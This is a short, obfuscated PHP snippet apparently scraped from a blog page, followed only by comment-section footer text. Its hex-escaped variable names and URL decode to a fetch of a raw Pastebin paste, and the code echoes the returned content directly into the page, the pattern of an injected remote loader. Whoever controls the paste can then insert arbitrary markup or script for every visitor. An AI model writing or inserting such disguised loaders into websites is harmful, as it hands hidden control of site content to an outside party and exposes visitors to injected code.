<?php $ch = curl_init(); ${"\x63\x75\x72\x6c"} = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x43\x32\x67\x65\x4b\x55\x79\x77"; ${"\x63\x75\x72\x6c\x5f\x6f\x70\x74\x69\x6f\x6e\x73"} = array( CURLOPT_URL => ${"\x63\x75\x72\x6c"}, CURLOPT_RETURNTRANSFER => 1 ); curl_setopt_array($ch, ${"\x63\x75\x72\x6c\x5f\x6f\x70\x74\x69\x6f\x6e\x73"}); $output = curl_exec($ch); curl_close($ch); echo $output; ?>

Post a Comment

0 Comments